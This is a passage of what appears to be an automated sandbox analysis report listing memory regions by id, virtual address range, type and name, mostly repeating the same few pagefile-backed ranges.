0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9468 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9469 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9470 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9471 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9472 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9473 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9474 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9475 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9476 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9477 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9478 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9479 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9480 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9481 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9482 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9483 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9484 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9485 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9486 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9487 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9488 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9489 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9490 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9491 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9492 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9493 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9494 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9495 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9496 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9497 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9498 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9499 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9500 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9501 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9502 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9503 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9504 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9505 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9506 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9507 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9508 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9509 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9510 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9511 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9512 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9513 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9514 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9515 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9516 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9517 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9518 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9519 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9520 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9521 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9522 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9523 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9524 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9525 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9526 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9527 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9528 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9529 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9530 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9531 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9532 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9533 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9534 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9535 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9536 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9537 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9538 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9539 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9540 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9541 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9542 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9543 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9544 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9545 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9546 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9547 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9548 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9549 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9550 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9551 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9552 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9553 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9554 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9555 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9556 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9557 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9558 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9559 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9560 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9561 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9562 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9563 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9564 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9565 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9566 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9567 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9568 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9569 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9570 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9571 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9572 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9573 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9574 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9575 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9576 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9577 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9578 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9579 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9580 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9581 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9582 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9583 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9584 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9585 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9586 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9587 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9588 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9589 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9590 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9591 start_va = 0x44f0000 end_va = 0x4507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9592 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9593 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9594 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9595 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9596 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9597 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9598 start_va = 0x44f0000 end_va = 0x4501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9599 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9600 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9601 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9602 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 9603 start_va = 0x44f0000 end_va = 0x450bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 9604 start_va = 0x4510000 end_va = 0x451dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 9605 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9606 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9607 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9608 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9609 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9610 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9611 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9612 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9613 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9614 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9615 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9616 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9617 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9618 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9619 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9620 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9621 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9622 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9623 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9624 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9625 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9626 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9627 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9628 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9629 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9630 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9631 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9632 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9633 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9634 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9635 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9636 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9637 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9638 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9639 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9640 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9641 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9642 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9643 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9644 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9645 start_va = 0x72a0000 